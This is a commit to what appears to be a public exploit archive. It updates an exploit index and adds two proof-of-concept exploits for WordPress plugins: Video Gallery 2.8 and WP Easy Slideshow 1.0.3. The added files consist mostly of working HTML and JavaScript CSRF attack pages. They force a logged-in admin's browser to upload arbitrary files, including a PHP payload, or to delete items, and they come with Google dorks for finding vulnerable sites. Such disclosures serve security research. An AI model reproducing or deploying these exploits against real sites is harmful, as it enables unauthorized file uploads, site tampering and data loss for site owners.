DB: 2015-04-06

Offensive Security · Offensive Security · commit f7fce69883ae · 2015-04-06T08:36:30.000Z
2 new exploits
diff --git a/files.csv b/files.csv
@@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download &  execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
-36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
@@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port
 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
+36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
+36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt
diff --git a/platforms/php/webapps/36610.txt b/platforms/php/webapps/36610.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload
+# Google Dork: inurl:/wp-content/plugins/contus-video-gallery
+# Date: 31 March 2015
+# Exploit Author: Divya
+# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/
+# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
+# Version: 2.8
+# Tested on: Windows, Linux
+# CVE : None
+
+CSRF File Upload Exploit Code:
+
+<html>
+<head>
+<title>
+WP Plugin CSRF File Upload
+</title>
+<body>
+	<script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649");
+        xhr.withCredentials = true;
+        var body = "-----------------------------103932797413649\r\n" + 
+          "Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" + 
+          "Content-Type: video/mp4\r\n" + 
+          "\r\n" + 
+          "hello world how are you\r\n" + 
+          "-----------------------------103932797413649\r\n" + 
+          "Content-Disposition: form-data; name=\"mode\"\r\n" + 
+          "\r\n" + 
+          "video\r\n" + 
+          "-----------------------------103932797413649--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit" onclick="submitRequest();" />
+    </form>
+
+	
+  </body>
+</html>
+
+
+Other CSRF vulnerable areas of application:
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=video
+
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=image
+
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=srt
diff --git a/platforms/php/webapps/36612.txt b/platforms/php/webapps/36612.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities
+# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/
+# Date: 2 April 2015
+# Exploit Author: Divya
+# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/
+# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip
+# Version: 1.0.3
+# Tested on: Windows, Linux
+# CVE : None
+
+Delete operation using CSRF:
+
+<img src="http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=[number]">
+Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1
+
+<html>
+  <head><title>CSRF Delete Operation</title></head>
+  <body>
+    <form action="http://192.168.1.2/wp-admin/admin.php">
+      <input type="hidden" name="page" value="wss-images" />
+      <input type="hidden" name="del_id" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Arbitrary File Upload using CSRF:
+
+<html>
+  <head><title>WP CSRF File Upload</title></head>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1559691976562");
+        xhr.withCredentials = true;
+        var body = "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"wss_image\"; filename=\"myfile.php\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\x3c?php\r\n" + 
+          "phpinfo();\r\n" + 
+          "?\x3e\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"desc_content\"\r\n" + 
+          "\r\n" + 
+          "CSRF File Upload\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"image_link\"\r\n" + 
+          "\r\n" + 
+          "linkData\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
+          "\r\n" + 
+          "Submit\r\n" + 
+          "-----------------------------1559691976562--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+
+Arbitrary File Upload (Authenticated):
+
+URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image
+
+The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server.
+
+Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/
